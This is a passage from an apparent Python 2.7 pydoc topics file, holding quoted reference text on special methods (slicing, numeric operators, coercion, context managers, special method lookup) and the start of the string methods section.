'found, a slice\n' ' object is created instead, and passed to "__getitem__()" ' 'instead.\n' '\n' 'object.__setslice__(self, i, j, sequence)\n' '\n' ' Called to implement assignment to "self[i:j]". Same notes ' 'for *i*\n' ' and *j* as for "__getslice__()".\n' '\n' ' This method is deprecated. If no "__setslice__()" is ' 'found, or for\n' ' extended slicing of the form "self[i:j:k]", a slice ' 'object is\n' ' created, and passed to "__setitem__()", instead of ' '"__setslice__()"\n' ' being called.\n' '\n' 'object.__delslice__(self, i, j)\n' '\n' ' Called to implement deletion of "self[i:j]". Same notes ' 'for *i* and\n' ' *j* as for "__getslice__()". This method is deprecated. ' 'If no\n' ' "__delslice__()" is found, or for extended slicing of the ' 'form\n' ' "self[i:j:k]", a slice object is created, and passed to\n' ' "__delitem__()", instead of "__delslice__()" being ' 'called.\n' '\n' 'Notice that these methods are only invoked when a single ' 'slice with a\n' 'single colon is used, and the slice method is available. ' 'For slice\n' 'operations involving extended slice notation, or in absence ' 'of the\n' 'slice methods, "__getitem__()", "__setitem__()" or ' '"__delitem__()" is\n' 'called with a slice object as argument.\n' '\n' 'The following example demonstrate how to make your program ' 'or module\n' 'compatible with earlier versions of Python (assuming that ' 'methods\n' '"__getitem__()", "__setitem__()" and "__delitem__()" support ' 'slice\n' 'objects as arguments):\n' '\n' ' class MyClass:\n' ' ...\n' ' def __getitem__(self, index):\n' ' ...\n' ' def __setitem__(self, index, value):\n' ' ...\n' ' def __delitem__(self, index):\n' ' ...\n' '\n' ' if sys.version_info < (2, 0):\n' " # They won't be defined if version is at least " '2.0 final\n' '\n' ' def __getslice__(self, i, j):\n' ' return self[max(0, i):max(0, j):]\n' ' def __setslice__(self, i, j, seq):\n' ' self[max(0, i):max(0, j):] = seq\n' ' def __delslice__(self, i, j):\n' ' del self[max(0, i):max(0, j):]\n' ' ...\n' '\n' 'Note the calls to "max()"; these are necessary because of ' 'the handling\n' 'of negative indices before the "__*slice__()" methods are ' 'called.\n' 'When negative indexes are used, the "__*item__()" methods ' 'receive them\n' 'as provided, but the "__*slice__()" methods get a "cooked" ' 'form of the\n' 'index values. For each negative index value, the length of ' 'the\n' 'sequence is added to the index before calling the method ' '(which may\n' 'still result in a negative index); this is the customary ' 'handling of\n' 'negative indexes by the built-in sequence types, and the ' '"__*item__()"\n' 'methods are expected to do this as well. However, since ' 'they should\n' 'already be doing that, negative indexes cannot be passed in; ' 'they must\n' 'be constrained to the bounds of the sequence before being ' 'passed to\n' 'the "__*item__()" methods. Calling "max(0, i)" conveniently ' 'returns\n' 'the proper value.\n' '\n' '\n' 'Emulating numeric types\n' '=======================\n' '\n' 'The following methods can be defined to emulate numeric ' 'objects.\n' 'Methods corresponding to operations that are not supported ' 'by the\n' 'particular kind of number implemented (e.g., bitwise ' 'operations for\n' 'non-integral numbers) should be left undefined.\n' '\n' 'object.__add__(self, other)\n' 'object.__sub__(self, other)\n' 'object.__mul__(self, other)\n' 'object.__floordiv__(self, other)\n' 'object.__mod__(self, other)\n' 'object.__divmod__(self, other)\n' 'object.__pow__(self, other[, modulo])\n' 'object.__lshift__(self, other)\n' 'object.__rshift__(self, other)\n' 'object.__and__(self, other)\n' 'object.__xor__(self, other)\n' 'object.__or__(self, other)\n' '\n' ' These methods are called to implement the binary ' 'arithmetic\n' ' operations ("+", "-", "*", "//", "%", "divmod()", ' '"pow()", "**",\n' ' "<<", ">>", "&", "^", "|"). For instance, to evaluate ' 'the\n' ' expression "x + y", where *x* is an instance of a class ' 'that has an\n' ' "__add__()" method, "x.__add__(y)" is called. The ' '"__divmod__()"\n' ' method should be the equivalent to using "__floordiv__()" ' 'and\n' ' "__mod__()"; it should not be related to "__truediv__()" ' '(described\n' ' below). Note that "__pow__()" should be defined to ' 'accept an\n' ' optional third argument if the ternary version of the ' 'built-in\n' ' "pow()" function is to be supported.\n' '\n' ' If one of those methods does not support the operation ' 'with the\n' ' supplied arguments, it should return "NotImplemented".\n' '\n' 'object.__div__(self, other)\n' 'object.__truediv__(self, other)\n' '\n' ' The division operator ("/") is implemented by these ' 'methods. The\n' ' "__truediv__()" method is used when "__future__.division" ' 'is in\n' ' effect, otherwise "__div__()" is used. If only one of ' 'these two\n' ' methods is defined, the object will not support division ' 'in the\n' ' alternate context; "TypeError" will be raised instead.\n' '\n' 'object.__radd__(self, other)\n' 'object.__rsub__(self, other)\n' 'object.__rmul__(self, other)\n' 'object.__rdiv__(self, other)\n' 'object.__rtruediv__(self, other)\n' 'object.__rfloordiv__(self, other)\n' 'object.__rmod__(self, other)\n' 'object.__rdivmod__(self, other)\n' 'object.__rpow__(self, other)\n' 'object.__rlshift__(self, other)\n' 'object.__rrshift__(self, other)\n' 'object.__rand__(self, other)\n' 'object.__rxor__(self, other)\n' 'object.__ror__(self, other)\n' '\n' ' These methods are called to implement the binary ' 'arithmetic\n' ' operations ("+", "-", "*", "/", "%", "divmod()", "pow()", ' '"**",\n' ' "<<", ">>", "&", "^", "|") with reflected (swapped) ' 'operands.\n' ' These functions are only called if the left operand does ' 'not\n' ' support the corresponding operation and the operands are ' 'of\n' ' different types. [2] For instance, to evaluate the ' 'expression "x -\n' ' y", where *y* is an instance of a class that has an ' '"__rsub__()"\n' ' method, "y.__rsub__(x)" is called if "x.__sub__(y)" ' 'returns\n' ' *NotImplemented*.\n' '\n' ' Note that ternary "pow()" will not try calling ' '"__rpow__()" (the\n' ' coercion rules would become too complicated).\n' '\n' " Note: If the right operand's type is a subclass of the " 'left\n' " operand's type and that subclass provides the reflected " 'method\n' ' for the operation, this method will be called before ' 'the left\n' " operand's non-reflected method. This behavior allows " 'subclasses\n' " to override their ancestors' operations.\n" '\n' 'object.__iadd__(self, other)\n' 'object.__isub__(self, other)\n' 'object.__imul__(self, other)\n' 'object.__idiv__(self, other)\n' 'object.__itruediv__(self, other)\n' 'object.__ifloordiv__(self, other)\n' 'object.__imod__(self, other)\n' 'object.__ipow__(self, other[, modulo])\n' 'object.__ilshift__(self, other)\n' 'object.__irshift__(self, other)\n' 'object.__iand__(self, other)\n' 'object.__ixor__(self, other)\n' 'object.__ior__(self, other)\n' '\n' ' These methods are called to implement the augmented ' 'arithmetic\n' ' assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", ' '"<<=",\n' ' ">>=", "&=", "^=", "|="). These methods should attempt ' 'to do the\n' ' operation in-place (modifying *self*) and return the ' 'result (which\n' ' could be, but does not have to be, *self*). If a ' 'specific method\n' ' is not defined, the augmented assignment falls back to ' 'the normal\n' ' methods. For instance, to execute the statement "x += ' 'y", where\n' ' *x* is an instance of a class that has an "__iadd__()" ' 'method,\n' ' "x.__iadd__(y)" is called. If *x* is an instance of a ' 'class that\n' ' does not define a "__iadd__()" method, "x.__add__(y)" ' 'and\n' ' "y.__radd__(x)" are considered, as with the evaluation of ' '"x + y".\n' '\n' 'object.__neg__(self)\n' 'object.__pos__(self)\n' 'object.__abs__(self)\n' 'object.__invert__(self)\n' '\n' ' Called to implement the unary arithmetic operations ("-", ' '"+",\n' ' "abs()" and "~").\n' '\n' 'object.__complex__(self)\n' 'object.__int__(self)\n' 'object.__long__(self)\n' 'object.__float__(self)\n' '\n' ' Called to implement the built-in functions "complex()", ' '"int()",\n' ' "long()", and "float()". Should return a value of the ' 'appropriate\n' ' type.\n' '\n' 'object.__oct__(self)\n' 'object.__hex__(self)\n' '\n' ' Called to implement the built-in functions "oct()" and ' '"hex()".\n' ' Should return a string value.\n' '\n' 'object.__index__(self)\n' '\n' ' Called to implement "operator.index()". Also called ' 'whenever\n' ' Python needs an integer object (such as in slicing). ' 'Must return\n' ' an integer (int or long).\n' '\n' ' New in version 2.5.\n' '\n' 'object.__coerce__(self, other)\n' '\n' ' Called to implement "mixed-mode" numeric arithmetic. ' 'Should either\n' ' return a 2-tuple containing *self* and *other* converted ' 'to a\n' ' common numeric type, or "None" if conversion is ' 'impossible. When\n' ' the common type would be the type of "other", it is ' 'sufficient to\n' ' return "None", since the interpreter will also ask the ' 'other object\n' ' to attempt a coercion (but sometimes, if the ' 'implementation of the\n' ' other type cannot be changed, it is useful to do the ' 'conversion to\n' ' the other type here). A return value of "NotImplemented" ' 'is\n' ' equivalent to returning "None".\n' '\n' '\n' 'Coercion rules\n' '==============\n' '\n' 'This section used to document the rules for coercion. As ' 'the language\n' 'has evolved, the coercion rules have become hard to ' 'document\n' 'precisely; documenting what one version of one particular\n' 'implementation does is undesirable. Instead, here are some ' 'informal\n' 'guidelines regarding coercion. In Python 3, coercion will ' 'not be\n' 'supported.\n' '\n' '* If the left operand of a % operator is a string or Unicode ' 'object,\n' ' no coercion takes place and the string formatting ' 'operation is\n' ' invoked instead.\n' '\n' '* It is no longer recommended to define a coercion ' 'operation. Mixed-\n' " mode operations on types that don't define coercion pass " 'the\n' ' original arguments to the operation.\n' '\n' '* New-style classes (those derived from "object") never ' 'invoke the\n' ' "__coerce__()" method in response to a binary operator; ' 'the only\n' ' time "__coerce__()" is invoked is when the built-in ' 'function\n' ' "coerce()" is called.\n' '\n' '* For most intents and purposes, an operator that returns\n' ' "NotImplemented" is treated the same as one that is not ' 'implemented\n' ' at all.\n' '\n' '* Below, "__op__()" and "__rop__()" are used to signify the ' 'generic\n' ' method names corresponding to an operator; "__iop__()" is ' 'used for\n' ' the corresponding in-place operator. For example, for the ' 'operator\n' ' \'"+"\', "__add__()" and "__radd__()" are used for the ' 'left and right\n' ' variant of the binary operator, and "__iadd__()" for the ' 'in-place\n' ' variant.\n' '\n' '* For objects *x* and *y*, first "x.__op__(y)" is tried. If ' 'this is\n' ' not implemented or returns "NotImplemented", ' '"y.__rop__(x)" is\n' ' tried. If this is also not implemented or returns ' '"NotImplemented",\n' ' a "TypeError" exception is raised. But see the following ' 'exception:\n' '\n' '* Exception to the previous item: if the left operand is an ' 'instance\n' ' of a built-in type or a new-style class, and the right ' 'operand is an\n' ' instance of a proper subclass of that type or class and ' 'overrides\n' ' the base\'s "__rop__()" method, the right operand\'s ' '"__rop__()"\n' ' method is tried *before* the left operand\'s "__op__()" ' 'method.\n' '\n' ' This is done so that a subclass can completely override ' 'binary\n' ' operators. Otherwise, the left operand\'s "__op__()" ' 'method would\n' ' always accept the right operand: when an instance of a ' 'given class\n' ' is expected, an instance of a subclass of that class is ' 'always\n' ' acceptable.\n' '\n' '* When either operand type defines a coercion, this coercion ' 'is\n' ' called before that type\'s "__op__()" or "__rop__()" ' 'method is\n' ' called, but no sooner. If the coercion returns an object ' 'of a\n' ' different type for the operand whose coercion is invoked, ' 'part of\n' ' the process is redone using the new object.\n' '\n' '* When an in-place operator (like \'"+="\') is used, if the ' 'left\n' ' operand implements "__iop__()", it is invoked without any ' 'coercion.\n' ' When the operation falls back to "__op__()" and/or ' '"__rop__()", the\n' ' normal coercion rules apply.\n' '\n' '* In "x + y", if *x* is a sequence that implements sequence\n' ' concatenation, sequence concatenation is invoked.\n' '\n' '* In "x * y", if one operand is a sequence that implements ' 'sequence\n' ' repetition, and the other is an integer ("int" or "long"), ' 'sequence\n' ' repetition is invoked.\n' '\n' '* Rich comparisons (implemented by methods "__eq__()" and so ' 'on)\n' ' never use coercion. Three-way comparison (implemented by\n' ' "__cmp__()") does use coercion under the same conditions ' 'as other\n' ' binary operations use it.\n' '\n' '* In the current implementation, the built-in numeric types ' '"int",\n' ' "long", "float", and "complex" do not use coercion. All ' 'these types\n' ' implement a "__coerce__()" method, for use by the ' 'built-in\n' ' "coerce()" function.\n' '\n' ' Changed in version 2.7: The complex type no longer makes ' 'implicit\n' ' calls to the "__coerce__()" method for mixed-type binary ' 'arithmetic\n' ' operations.\n' '\n' '\n' 'With Statement Context Managers\n' '===============================\n' '\n' 'New in version 2.5.\n' '\n' 'A *context manager* is an object that defines the runtime ' 'context to\n' 'be established when executing a "with" statement. The ' 'context manager\n' 'handles the entry into, and the exit from, the desired ' 'runtime context\n' 'for the execution of the block of code. Context managers ' 'are normally\n' 'invoked using the "with" statement (described in section The ' 'with\n' 'statement), but can also be used by directly invoking their ' 'methods.\n' '\n' 'Typical uses of context managers include saving and ' 'restoring various\n' 'kinds of global state, locking and unlocking resources, ' 'closing opened\n' 'files, etc.\n' '\n' 'For more information on context managers, see Context ' 'Manager Types.\n' '\n' 'object.__enter__(self)\n' '\n' ' Enter the runtime context related to this object. The ' '"with"\n' " statement will bind this method's return value to the " 'target(s)\n' ' specified in the "as" clause of the statement, if any.\n' '\n' 'object.__exit__(self, exc_type, exc_value, traceback)\n' '\n' ' Exit the runtime context related to this object. The ' 'parameters\n' ' describe the exception that caused the context to be ' 'exited. If the\n' ' context was exited without an exception, all three ' 'arguments will\n' ' be "None".\n' '\n' ' If an exception is supplied, and the method wishes to ' 'suppress the\n' ' exception (i.e., prevent it from being propagated), it ' 'should\n' ' return a true value. Otherwise, the exception will be ' 'processed\n' ' normally upon exit from this method.\n' '\n' ' Note that "__exit__()" methods should not reraise the ' 'passed-in\n' " exception; this is the caller's responsibility.\n" '\n' 'See also:\n' '\n' ' **PEP 343** - The "with" statement\n' ' The specification, background, and examples for the ' 'Python "with"\n' ' statement.\n' '\n' '\n' 'Special method lookup for old-style classes\n' '===========================================\n' '\n' 'For old-style classes, special methods are always looked up ' 'in exactly\n' 'the same way as any other method or attribute. This is the ' 'case\n' 'regardless of whether the method is being looked up ' 'explicitly as in\n' '"x.__getitem__(i)" or implicitly as in "x[i]".\n' '\n' 'This behaviour means that special methods may exhibit ' 'different\n' 'behaviour for different instances of a single old-style ' 'class if the\n' 'appropriate special attributes are set differently:\n' '\n' ' >>> class C:\n' ' ... pass\n' ' ...\n' ' >>> c1 = C()\n' ' >>> c2 = C()\n' ' >>> c1.__len__ = lambda: 5\n' ' >>> c2.__len__ = lambda: 9\n' ' >>> len(c1)\n' ' 5\n' ' >>> len(c2)\n' ' 9\n' '\n' '\n' 'Special method lookup for new-style classes\n' '===========================================\n' '\n' 'For new-style classes, implicit invocations of special ' 'methods are\n' "only guaranteed to work correctly if defined on an object's " 'type, not\n' "in the object's instance dictionary. That behaviour is the " 'reason why\n' 'the following code raises an exception (unlike the ' 'equivalent example\n' 'with old-style classes):\n' '\n' ' >>> class C(object):\n' ' ... pass\n' ' ...\n' ' >>> c = C()\n' ' >>> c.__len__ = lambda: 5\n' ' >>> len(c)\n' ' Traceback (most recent call last):\n' ' File "<stdin>", line 1, in <module>\n' " TypeError: object of type 'C' has no len()\n" '\n' 'The rationale behind this behaviour lies with a number of ' 'special\n' 'methods such as "__hash__()" and "__repr__()" that are ' 'implemented by\n' 'all objects, including type objects. If the implicit lookup ' 'of these\n' 'methods used the conventional lookup process, they would ' 'fail when\n' 'invoked on the type object itself:\n' '\n' ' >>> 1 .__hash__() == hash(1)\n' ' True\n' ' >>> int.__hash__() == hash(int)\n' ' Traceback (most recent call last):\n' ' File "<stdin>", line 1, in <module>\n' " TypeError: descriptor '__hash__' of 'int' object needs an " 'argument\n' '\n' 'Incorrectly attempting to invoke an unbound method of a ' 'class in this\n' "way is sometimes referred to as 'metaclass confusion', and " 'is avoided\n' 'by bypassing the instance when looking up special methods:\n' '\n' ' >>> type(1).__hash__(1) == hash(1)\n' ' True\n' ' >>> type(int).__hash__(int) == hash(int)\n' ' True\n' '\n' 'In addition to bypassing any instance attributes in the ' 'interest of\n' 'correctness, implicit special method lookup generally also ' 'bypasses\n' 'the "__getattribute__()" method even of the object\'s ' 'metaclass:\n' '\n' ' >>> class Meta(type):\n' ' ... def __getattribute__(*args):\n' ' ... print "Metaclass getattribute invoked"\n' ' ... return type.__getattribute__(*args)\n' ' ...\n' ' >>> class C(object):\n' ' ... __metaclass__ = Meta\n' ' ... def __len__(self):\n' ' ... return 10\n' ' ... def __getattribute__(*args):\n' ' ... print "Class getattribute invoked"\n' ' ... return object.__getattribute__(*args)\n' ' ...\n' ' >>> c = C()\n' ' >>> c.__len__() # Explicit lookup via ' 'instance\n' ' Class getattribute invoked\n' ' 10\n' ' >>> type(c).__len__(c) # Explicit lookup via ' 'type\n' ' Metaclass getattribute invoked\n' ' 10\n' ' >>> len(c) # Implicit lookup\n' ' 10\n' '\n' 'Bypassing the "__getattribute__()" machinery in this fashion ' 'provides\n' 'significant scope for speed optimisations within the ' 'interpreter, at\n' 'the cost of some flexibility in the handling of special ' 'methods (the\n' 'special method *must* be set on the class object itself in ' 'order to be\n' 'consistently invoked by the interpreter).\n' '\n' '-[ Footnotes ]-\n' '\n' "[1] It *is* possible in some cases to change an object's " 'type,\n' " under certain controlled conditions. It generally isn't " 'a good\n' ' idea though, since it can lead to some very strange ' 'behaviour if\n' ' it is handled incorrectly.\n' '\n' '[2] For operands of the same type, it is assumed that if the ' 'non-\n' ' reflected method (such as "__add__()") fails the ' 'operation is not\n' ' supported, which is why the reflected method is not ' 'called.\n', 'string-methods': '\n' 'String Methods\n' '**************\n' '\n' 'Below are listed the string methods which both 8-bit ' 'strings and\n' 'Unicode objects support. Some of them are also available ' 'on\n' '"bytearray" objects.\n' '\n' "In addition, Python's strings support the sequence type " 'methods\n' 'described in the Sequence Types --- str, unicode, list, ' 'tuple,\n' 'bytearray, buffer, xrange section. To output formatted ' 'strings use\n' 'template strings or the "%" operator described in the ' 'String\n' 'Formatting Operations section. Also, see the "re" module ' 'for string\n' 'functions based on regular expressions.\n' '\n' 'str.capitalize()\n' '\n' ' Return a copy of the string with its first character ' 'capitalized\n' ' and the rest lowercased.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.center(width[, fillchar])\n' '\n' ' Return centered in a string of length *width*. Padding ' 'is done\n' ' using the specified *fillchar* (default is a space).\n' '\n' ' Changed in version 2.4: Support for the *fillchar* ' 'argument.\n' '\n' 'str.count(sub[, start[, end]])\n' '\n' ' Return the number of non-overlapping occurrences of ' 'substring *sub*\n' ' in the range [*start*, *end*]. Optional arguments ' '*start* and\n' ' *end* are interpreted as in slice notation.\n' '\n' 'str.decode([encoding[, errors]])\n' '\n' ' Decodes the string using the codec registered for ' '*encoding*.\n' ' *encoding* defaults to the default string encoding. ' '*errors* may\n' ' be given to set a different error handling scheme. The ' 'default is\n' ' "\'strict\'", meaning that encoding errors raise ' '"UnicodeError".\n' ' Other possible values are "\'ignore\'", "\'replace\'" ' 'and any other\n' ' name registered via "codecs.register_error()", see ' 'section Codec\n' ' Base Classes.\n' '\n' ' New in version 2.2.\n' '\n' ' Changed in version 2.3: Support for other error ' 'handling schemes\n' ' added.\n' '\n' ' Changed in version 2.7: Support for keyword arguments ' 'added.\n' '\n' 'str.encode([encoding[, errors]])\n' '\n' ' Return an encoded version of the string. Default ' 'encoding is the\n' ' current default string encoding. *errors* may be given ' 'to set a\n' ' different error handling scheme. The default for ' '*errors* is\n' ' "\'strict\'", meaning that encoding errors raise a ' '"UnicodeError".\n' ' Other possible values are "\'ignore\'", "\'replace\'",\n' ' "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any ' 'other name\n' ' registered via "codecs.register_error()", see section ' 'Codec Base\n' ' Classes. For a list of possible encodings, see section ' 'Standard\n' ' Encodings.\n' '\n' ' New in version 2.0.\n' '\n' ' Changed in version 2.3: Support for ' '"\'xmlcharrefreplace\'" and\n' ' "\'backslashreplace\'" and other error handling schemes ' 'added.\n' '\n' ' Changed in version 2.7: Support for keyword arguments ' 'added.\n' '\n' 'str.endswith(suffix[, start[, end]])\n' '\n' ' Return "True" if the string ends with the specified ' '*suffix*,\n' ' otherwise return "False". *suffix* can also be a tuple ' 'of suffixes\n' ' to look for. With optional *start*, test beginning at ' 'that\n' ' position. With optional *end*, stop comparing at that ' 'position.\n' '\n' ' Changed in version 2.5: Accept tuples as *suffix*.\n' '\n' 'str.expandtabs([tabsize])\n' '\n' ' Return a copy of the string where all tab characters ' 'are replaced\n' ' by one or more spaces, depending on the current column ' 'and the\n' ' given tab size. Tab positions occur every *tabsize* ' 'characters\n' ' (default is 8, giving tab positions at columns 0, 8, 16 ' 'and so on).\n' ' To expand the string, the current column is set to zero ' 'and the\n' ' string is examined character by character. If the ' 'character is a\n' ' tab ("\\t"), one or more space characters are inserted ' 'in the result\n' ' until the current column is equal to the next tab ' 'position. (The\n' ' tab character itself is not copied.) If the character ' 'is a newline\n' ' ("\\n") or return ("\\r"), it is copied and the current ' 'column is\n' ' reset to zero. Any other character is copied unchanged ' 'and the\n' ' current column is incremented by one regardless of how ' 'the\n' ' character is represented when printed.\n' '\n' " >>> '01\\t012\\t0123\\t01234'.expandtabs()\n" " '01 012 0123 01234'\n" " >>> '01\\t012\\t0123\\t01234'.expandtabs(4)\n" " '01 012 0123 01234'\n" '\n' 'str.find(sub[, start[, end]])\n' '\n' ' Return the lowest index in the string where substring ' '*sub* is\n' ' found within the slice "s[start:end]". Optional ' 'arguments *start*\n' ' and *end* are interpreted as in slice notation. Return ' '"-1" if\n' ' *sub* is not found.\n' '\n' ' Note: The "find()" method should be used only if you ' 'need to know\n' ' the position of *sub*. To check if *sub* is a ' 'substring or not,\n' ' use the "in" operator:\n' '\n' " >>> 'Py' in 'Python'\n" ' True\n' '\n' 'str.format(*args, **kwargs)\n' '\n' ' Perform a string formatting operation. The string on ' 'which this\n' ' method is called can contain literal text or ' 'replacement fields\n' ' delimited by braces "{}". Each replacement field ' 'contains either\n' ' the numeric index of a positional argument, or the name ' 'of a\n' ' keyword argument. Returns a copy of the string where ' 'each\n' ' replacement field is replaced with the string value of ' 'the\n' ' corresponding argument.\n' '\n' ' >>> "The sum of 1 + 2 is {0}".format(1+2)\n' " 'The sum of 1 + 2 is 3'\n" '\n' ' See Format String Syntax for a description of the ' 'various\n' ' formatting options that can be specified in format ' 'strings.\n' '\n' ' This method of string formatting is the new standard in ' 'Python 3,\n' ' and should be preferred to the "%" formatting described ' 'in String\n' ' Formatting Operations in new code.\n' '\n' ' New in version 2.6.\n' '\n' 'str.index(sub[, start[, end]])\n' '\n' ' Like "find()", but raise "ValueError" when the ' 'substring is not\n' ' found.\n' '\n' 'str.isalnum()\n' '\n' ' Return true if all characters in the string are ' 'alphanumeric and\n' ' there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isalpha()\n' '\n' ' Return true if all characters in the string are ' 'alphabetic and\n' ' there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isdigit()\n' '\n' ' Return true if all characters in the string are digits ' 'and there is\n' ' at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.islower()\n' '\n' ' Return true if all cased characters [4] in the string ' 'are lowercase\n' ' and there is at least one cased character, false ' 'otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isspace()\n' '\n' ' Return true if there are only whitespace characters in ' 'the string\n' ' and there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.istitle()\n' '\n' ' Return true if the string is a titlecased string and ' 'there is at\n' ' least one character, for example uppercase characters ' 'may only\n' ' follow uncased characters and lowercase characters only ' 'cased ones.\n' ' Return false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isupper()\n' '\n' ' Return true if all cased characters [4] in the string ' 'are uppercase\n' ' and there is at least one cased character, false ' 'otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.join(iterable)\n' '\n' ' Return a string which is the concatenation of the ' 'strings in the\n' ' *iterable* *iterable*. The separator between elements ' 'is the\n' ' string providing this method.\n' '\n' 'str.ljust(width[, fillchar])\n' '\n' ' Return the string left justified in a string of length ' '*width*.\n' ' Padding is done using the specified *fillchar* (default ' 'is a\n' ' space). The original string is returned if *width* is ' 'less than or\n' ' equal to "len(s)".\n' '\n' ' Changed in version 2.4: Support for the *fillchar* ' 'argument.\n' '\n' 'str.lower()\n' '\n' ' Return a copy of the string with all the cased ' 'characters [4]\n' ' converted to lowercase.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.lstrip([chars])\n' '\n' ' Return a copy of the string with leading characters ' 'removed. The\n' ' *chars* argument is a string specifying the set of ' 'characters to be\n' ' removed. If omitted or "None", the *chars* argument ' 'defaults to\n' ' removing whitespace. The *chars* argument is not a ' 'prefix; rather,\n' ' all combinations of its values are stripped:\n' '\n' " >>> ' spacious '.lstrip()\n" " 'spacious '\n" " >>> 'www.example.com'.lstrip('cmowz.')\n" " 'example.com'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* ' 'argument.\n' '\n' 'str.partition(sep)\n' '\n' ' Split the string at the first occurrence of *sep*, and ' 'return a\n' ' 3-tuple containing the part before the separator, the ' 'separator\n' ' itself, and the part after the separator. If the ' 'separator is not\n' ' found, return a 3-tuple containing the string itself, ' 'followed by\n' ' two empty strings.\n' '\n' ' New in version 2.5.\n' '\n' 'str.replace(old, new[, count])\n' '\n' ' Return a copy of the string with all occurrences of ' 'substring *old*\n' ' replaced by *new*. If the optional argument *count* is ' 'given, only\n' ' the first *count* occurrences are replaced.\n' '\n' 'str.rfind(sub[, start[, end]])\n' '\n' ' Return the highest index in the string where substring ' '*sub* is\n' ' found, such that *sub* is contained within ' '"s[start:end]".\n' ' Optional arguments *start* and *end* are interpreted as ' 'in slice\n' ' notation. Return "-1" on failure.\n' '\n' 'str.rindex(sub[, start[, end]])\n' '\n' ' Like "rfind()" but raises "ValueError" when the ' 'substring *sub* is\n' ' not found.\n' '\n' 'str.rjust(width[, fillchar])\n' '\n' ' Return the string right justified in a string of length ' '*width*.\n' ' Padding is done using the specified *fillchar* (default ' 'is a\n' ' space). The original string is returned if *width* is ' 'less than or\n' ' equal to "len(s)".\n' '\n' ' Changed in version 2.4: Support for the *fillchar* ' 'argument.\n' '\n' 'str.rpartition(sep)\n' '\n' ' Split the string at the last occurrence of *sep*, and ' 'return a\n' ' 3-tuple containing the part before the separator, the ' 'separator\n' ' itself, and the part after the separator. If the ' 'separator is not\n' ' found, return a 3-tuple containing two empty strings, ' 'followed by\n' ' the string itself.\n' '\n' ' New in version 2.5.\n' '\n' 'str.rsplit([sep[, maxsplit]])\n' '\n' ' Return a list of the words in the string, using *sep* ' 'as the\n' ' delimiter string. If *maxsplit* is given, at most ' '*maxsplit* splits\n' ' are done, the *rightmost* ones. If *sep* is not ' 'specified or\n' ' "None", any whitespace string is a separator. Except ' 'for splitting\n' ' from the right, "rsplit()" behaves like "split()" which ' 'is\n' ' described in detail below.\n' '\n' ' New in version 2.4.\n' '\n' 'str.rstrip([chars])\n' '\n' ' Return a copy of the string with trailing characters ' 'removed. The\n' ' *chars* argument is a string specifying the set of ' 'characters to be\n' ' removed. If omitted or "None", the *chars* argument ' 'defaults to\n' ' removing whitespace. The *chars* argument is not a ' 'suffix; rather,\n' ' all combinations of its values are stripped:\n' '\n' " >>> ' spacious '.rstrip()\n" " ' spacious'\n" " >>> 'mississippi'.rstrip('ipz')\n" " 'mississ'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* ' 'argument.\n' '\n' 'str.split([sep[, maxsplit]])\n' '\n' ' Return a list of the words in the string, using *sep* ' 'as the\n' ' delimiter string. If *maxsplit* is given, at most ' '*maxsplit*\n' ' splits are done (thus, the list will have at most ' '"maxsplit+1"\n' ' elements). If *maxsplit* is not specified or "-1", ' 'then there is\n' ' no limit on the number of splits (all possible splits ' 'are made).\n' '\n' ' If *sep* is given, consecutive delimiters are not ' 'grouped together\n' ' and are deemed to delimit empty strings (for example,\n' ' "\'1,,2\'.split(\',\')" returns "[\'1\', \'\', ' '\'2\']"). The *sep* argument\n' ' may consist of multiple characters (for example,\n' ' "\'1<>2<>3\'.split(\'<>\')" returns "[\'1\', \'2\', ' '\'3\']"). Splitting an\n' ' empty string with a specified separator returns ' '"[\'\']".\n' '\n' ' If *sep* is not specified or is "None", a different ' 'splitting\n' ' algorithm is applied: runs of consecutive whitespace ' 'are regarded\n' ' as a single separator, and the result will contain no ' 'empty strings\n' ' at the start or end if the string has leading or ' 'trailing\n' ' whitespace. Consequently, splitting an empty string or ' 'a string\n' ' consisting of just whitespace with a "None" separator ' 'returns "[]".\n' '\n' ' For example, "\' 1 2 3 \'.split()" returns "[\'1\', ' '\'2\', \'3\']", and\n' ' "\' 1 2 3 \'.split(None, 1)" returns "[\'1\', ' '\'2 3 \']".\n' '\n' 'str.splitlines([keepends])\n' '\n' ' Return a list of the lines in the string, breaking at ' 'line\n' ' boundaries. This method uses the *universal newlines* ' 'approach to\n' ' splitting lines. Line breaks are not included in the ' 'resulting list\n' ' unless *keepends* is given and true.\n' '\n' ' For example, "\'ab c\\n\\nde ' 'fg\\rkl\\r\\n\'.splitlines()" returns "[\'ab\n' ' c\', \'\', \'de fg\', \'kl\']", while the same call ' 'with\n' ' "splitlines(True)" returns "[\'ab c\\n\', \'\\n\', \'de ' 'fg\\r\', \'kl\\r\\n\']".\n' '\n' ' Unlike "split()" when a delimiter string *sep* is ' 'given, this\n' ' method returns an empty list for the empty string, and ' 'a terminal\n' ' line break does not result in an extra line.\n' '\n' 'str.startswith(prefix[, start[, end]])\n' '\n' ' Return "True" if string starts with the *prefix*, ' 'otherwise return\n' ' "False". *prefix* can also be a tuple of prefixes to ' 'look for.\n' ' With optional *start*, test string beginning at that ' 'position.\n' ' With optional *end*, stop comparing string at that ' 'position.\n' '\n' ' Changed in version 2.5: Accept tuples as *prefix*.\n' '\n' 'str.strip([chars])\n' '\n' ' Return a copy of the string with the leading and ' 'trailing\n' ' characters removed. The *chars* argument is a string ' 'specifying the\n' ' set of characters to be removed. If omitted or "None", ' 'the *chars*\n' ' argument defaults to removing whitespace. The *chars* ' 'argument is\n' ' not a prefix or suffix; rather, all combinations of its ' 'values are\n' ' stripped:\n' '\n' " >>> ' spacious '.strip()\n" " 'spacious'\n" " >>> 